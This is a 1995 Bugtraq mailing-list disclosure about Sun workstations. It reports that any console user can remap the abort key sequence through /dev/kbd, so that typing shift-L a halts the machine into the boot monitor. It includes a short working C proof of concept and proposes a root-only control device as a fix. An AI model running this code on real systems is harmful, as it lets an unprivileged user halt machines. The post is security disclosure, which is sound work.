[2438] in bugtraq
little whole on Suns concerning /dev/kbd
daemon@ATHENA.MIT.EDU (Arfst Ludwig)
Thu Dec 7 19:20:49 1995
Date: Sat, 2 Dec 1995 23:56:03 +0100
Reply-To: Bugtraq List <BUGTRAQ@crimelab.com>
From: Arfst Ludwig <Arfst.Ludwig@luxor.in-berlin.de>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@crimelab.com>
Hi!
On a SUN with SunOS 4.1.* or Solaris 2.* any user loged on the console can
remap the abort key sequence (the key sequence to enter the boot monitor).
Impact: Any arbitary key sequence can enter the boot monitor and halt
the machine.
The abort key sequence can easyly remaped e.g. to shift_l a. Instead of
getting an `A' the user gets the boot monitor promt:
8<--------------------------- cut here ----------------------------
#include <stdio.h>
#include <fcntl.h>
#include <sundev/kbd.h>
#include <sundev/kbio.h>
int main()
{
int fd;
struct kiockey k;
fd = open("/dev/kbd", O_RDWR);
k.kio_tablemask = KIOCABORT1;
k.kio_station = 0x6e;
ioctl(fd, KIOCSETKEY, &k);
k.kio_tablemask = KIOCABORT2;
k.kio_station = 0x4d;
ioctl(fd, KIOCSETKEY, &k);
close(fd);
return (0);
}
8<--------------------------- cut here ----------------------------
Is there a fix possible? /dev/kbd should be readable to the user logged
at the console. Redefining the abort sequence should only be allowed
via an new device e.g. /dev/kbdctl which is accessible only by root.
Cheers, Arfst
______________________________________________________________________
__
(00) Arfst Ludwig
\`\/ E-Mail: Arfst.Ludwig@luxor.in-berlin.de
"" carpe diem
